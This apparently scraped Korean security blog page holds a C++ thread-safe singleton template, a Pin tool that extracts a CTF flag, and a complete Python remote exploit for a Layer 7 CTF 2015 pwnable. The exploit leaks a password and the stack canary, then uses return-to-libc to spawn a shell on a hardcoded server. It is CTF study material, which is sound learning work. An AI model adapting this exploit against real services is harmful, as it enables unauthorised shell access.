[Design Pattern/C++] Modern C++ Thread-Safe Singleton Template

Basic Programming/Design Pattern 2016. 1. 25. 16:41

-Thread-Safe Singleton Template (Modern C++)-



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <iostream>
#include <thread>
#include <mutex>
 
template <class T>
class Singleton {
protected:
    Singleton() {};
    ~Singleton() {};
    Singleton(const Singleton& other) {};
 
private:
    static std::once_flag chkSingle;
    static std::shared_ptr<T> pInstance;
 
    static void destroy() {
        if (pInstance != nullptr) {
            pInstance.reset();
            pInstance = nullptr;
        }
    }
 
public:
    static T& getInstance() {
        std::call_once(chkSingle, []()
        {
            pInstance.reset(new T());
            std::atexit(destroy);
        });
        return *(pInstance.get());
    }
};
 
template <class T> std::shared_ptr<T> Singleton <T>::pInstance = nullptr;
template <class T> std::once_flag Singleton <T>::chkSingle;
cs



저작자표시 비영리 동일조건
Posted by RevDev
,

[Pintool/SSA] SSA Pwnable Study 1st Pintool

Security/DBI 2015. 11. 22. 00:33

SSA  - Pwnable Study 1st Pintool

-Opcodes and Immediate Operands Auto-Analysis -


※Special Thanks to KSHMK (Compile&Test)



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#include <stdio.h>
#include "pin.H"
 
FILE *fp;
unsigned char xorVal, cmpVal;
char chk = 0;
 
VOID Instruction(INS ins, VOID *v)
{
    ADDRINT addr = INS_Address(ins);
    if (addr >= 0x8048202 && addr <= 0x80a3778)
    {
        switch (INS_Opcode(ins)) {
        case XED_ICLASS_XOR:
            xorVal = (unsigned char)INS_OperandImmediate(ins, 1);
            chk = 1;
            break;
        case XED_ICLASS_CMP:
            cmpVal = (unsigned char)INS_OperandImmediate(ins, 1);
            if (chk) {
                chk = 0;
                fprintf(fp, "%c", (xorVal^cmpVal));
                break;
            }
            else {
                fprintf(fp, "%c", cmpVal);
                break;
            }
        }
        INS_Delete(ins);
    }
}
 
INT32 Usage()
{
    PIN_ERROR("This Pintool prints the IPs of every instruction executed\n"
        + KNOB_BASE::StringKnobSummary() + "\n");
    return -1;
}
VOID Start(THREADID threadIndex, CONTEXT *ctxt, INT32 flags, VOID *v)
{
    fp = fopen("flaaaag""w");
}
 
VOID Fini(THREADID threadIndex, const CONTEXT *ctxt, INT32 code, VOID *v)
{
    fclose(fp);
}
 
int main(int argc, char * argv[])
{
    if (PIN_Init(argc, argv)) return Usage();
    INS_AddInstrumentFunction(Instruction, 0);
    PIN_AddThreadStartFunction(Start, 0);
    PIN_AddThreadFiniFunction(Fini, 0);
    PIN_StartProgram();
    return 0;
}
cs



저작자표시 비영리 동일조건
Posted by RevDev
,

[Payload/Layer 7 CTF 2015] Pwnable - 'Spil..Spli....SPPPPPIILL'

Security/CTF 2015. 11. 5. 23:16

Layer 7 CTF 2015  - Pwnable 300

-Remote Return-to-Libc & SSP memory leaking-



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/python
#-*-coding:utf-8-*-
 
import socket
import struct
import telnetlib
 
#Endian Translator
= lambda x : struct.pack("<L", x)
up = lambda x : struct.unpack("<L", x)[0]
 
#Addresses
system_plt = 0x08048610
freebss = 0x0804b0e0
addr_leak_pass = 0x0804b060
 
#Misc
payload = None
password = None
canary = None
 
 
print '''
[!] Layer 7 CTF 2015 Spil..Spli....SPPPPPIILL Exploit [!]
~ By RevDev
~ Python 2.7
~ Remote Exploit
'''
 
print "[!] Establishing Connection [!]"
= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('52.192.51.122'8777))
print s
print ''
 
print "[!] Leaking Password [!]"
s.recv(1024)
payload = 'A'*129 + 'B'*156 + p(addr_leak_pass)
s.send(payload + '\n')
s.recv(1024)
password = s.recv(1024)
password = password[(password.index("***:"+ 5) : password.index(" terminated")]
password = password.split("\n")[0]
print "Password : %s\n" %password
s.close()
 
print "[!] Re-Establishing Connection [!]"
= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('52.192.51.122'8777))
print s
print ''
 
print "[!] Leaking Stack Canary & Injecting \"/bin/sh\" [!]"
s.recv(1024)
s.send(password + '\n')
s.recv(1024)
s.recv(1024)
s.send('2' + '\n')
s.recv(1024)
s.recv(1024)
s.send('1' + '\n')
s.recv(1024)
s.recv(1024)
s.send('4' + '\n')
s.recv(1024)
s.send('A'*21 + '\n')
s.recv(1024)
s.send("/bin/sh;" + '\n')
s.recv(1024)
s.send("I_h4t3_fuck1n_c4n4ry" + '\n')
s.recv(1024)
canary = s.recv(1024)
canary = canary[(canary.find("AAA\n"+ 4) : canary.find("Wow")]
if(len(canary) < 4):
    canary = '\x00'*(4 - len(canary)) + canary
print "Canary : 0x"+canary.encode('hex')
print "\"/bin/sh\" Address : 0x%x\n" %freebss
 
print "[!] Sending Exploit [!]"
s.send('3' + '\n')
s.recv(1024)
payload = 'A'*217 + canary + 'A'*12 + p(system_plt) + 'A'*4 + p(freebss) + '\n'
s.send(payload)
s.recv(1024)
s.recv(1024)
s.send('0' + '\n')
s.recv(1024)
s.recv(1024)
s.send('1' + '\n')
s.recv(1024)
s.recv(1024)
print "Payload : %s\n" %payload
 
print "[!] Shell [!]"
= telnetlib.Telnet()
t.sock = s
t.interact()
s.close()
cs
저작자표시 비영리 동일조건

'Security > CTF' 카테고리의 다른 글

[Write-Up/WhiteHat 2015 Junior] Pre-Qual WriteUp  (0) 2016.04.25
[Write-Up/Codegate 2016 Junior] Pre-Qual WriteUp  (0) 2016.04.25
[Payload/Codegate 2014 Junior] Pwnable - 'nuclear'  (0) 2015.10.06
[Write-Up/Inc0gnito CTF 2015] Reversing - Reversing  (0) 2015.08.26
[Write-Up/Inc0gnito CTF 2015] Reversing - Anti Hexray  (0) 2015.08.26
Posted by RevDev
,

티스토리툴바